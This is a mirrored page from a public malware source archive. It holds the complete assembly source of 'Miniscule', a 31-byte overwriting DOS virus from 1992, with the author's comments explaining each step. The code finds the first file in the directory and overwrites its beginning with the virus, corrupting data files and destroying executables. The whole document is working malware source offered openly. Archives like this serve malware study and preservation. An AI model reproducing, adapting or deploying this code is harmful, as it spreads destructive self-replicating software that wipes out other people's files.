mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 00:28:50 +00:00
77 lines
2.9 KiB
NASM
77 lines
2.9 KiB
NASM
|
; Miniscule: the world's smallest generic virus (only 31 bytes long!)
|
||
|
; (C) 1992 Nowhere Man and [NuKE] WaReZ
|
||
|
; Written on January 22, 1991
|
||
|
|
||
|
code segment 'CODE'
|
||
|
assume cs:code,ds:code,es:code,ss:code
|
||
|
|
||
|
org 0100h
|
||
|
|
||
|
main proc near
|
||
|
|
||
|
|
||
|
; Find the name of the first file and return it in the DTA. No checking
|
||
|
; is done for previous infections, and ANY file (except directory "files")
|
||
|
; will be infected, including data, texts, etc. So either a file is corrupted
|
||
|
; (in the case of data or text) or infected (.EXE and .COM files). Files that
|
||
|
; have the read-only flag set are immune to Miniscule.
|
||
|
|
||
|
mov ah,04Eh ; DOS find first file function
|
||
|
mov cl,020h ; CX holds attribute mask
|
||
|
mov dx,offset star_dot_com ; DX points to the file mask
|
||
|
int 021h
|
||
|
|
||
|
|
||
|
; Open the file that we've found for writing only and put the handle into
|
||
|
; BX (DOS stupidly returns the file handle in AX, but all other DOS functions
|
||
|
; require it to be in AX, so we have to move it).
|
||
|
|
||
|
mov ax,03D01h ; DOS open file function, w/o
|
||
|
mov dx,009Eh ; DX points to the found file
|
||
|
int 021h
|
||
|
|
||
|
xchg bx,ax ; BX holds the file handle
|
||
|
|
||
|
|
||
|
; Write the virus to the file. The first 31 bytes at offset 0100h (ie: the
|
||
|
; virus) are written into the beginning of the victim. No attempt is made
|
||
|
; to preserve the victim's executability. This also destroys the file's date
|
||
|
; and time, making Miniscule's activity painfully obvious. Also, if the
|
||
|
; victim is smaller than 31 bytes (rare), then it will grow to exactly 31.
|
||
|
|
||
|
mov ah,040h ; DOS write to file function
|
||
|
dec cx ; CX now holds 01Fh (length)
|
||
|
mov dx,offset main ; DX points to start of code
|
||
|
int 021h
|
||
|
|
||
|
|
||
|
; Exit. I chose to use a RET statement here to save one byte (RET is one byte
|
||
|
; long, INT 020h is two), so don't try to compile this as an .EXE file; it
|
||
|
; will crash, as only .COMs RETurn correctly (DOS again). However INFECTED
|
||
|
; .EXE programs will run successfully (unless they are larger than 64k, in
|
||
|
; which case DOS will refuse to run it.
|
||
|
|
||
|
ret ; RETurn to DOS
|
||
|
main endp
|
||
|
|
||
|
|
||
|
; The only data required in this program, and it's only four bytes long. This
|
||
|
; is the file mask that the DOS find first file function will use when
|
||
|
; searching. Do not change this to .EXE (or whatever) because this virus
|
||
|
; is size dependent (if you know what you're doing, go ahead [at you're own
|
||
|
; risk]).
|
||
|
|
||
|
star_dot_com db "*.*",0 ; File search mask
|
||
|
|
||
|
finish label near
|
||
|
|
||
|
code ends
|
||
|
end main
|
||
|
|
||
|
; There you have it: thirty-one bytes of pure terror -- NOT! As you can
|
||
|
; pretty well guess, this virus is very lame. Due to its poor reproduction,
|
||
|
; it is hardly a threat (hitting one file, if you're lucky), but it works,
|
||
|
; and it fits the definition of a virus. There is no way to make this code
|
||
|
; any smaller (at least under MS-DOS), except if you made it only infect
|
||
|
; one specific file (and the file would have to have a one- or two-byte name,
|
||
|
; too), and that would be next to useless.
|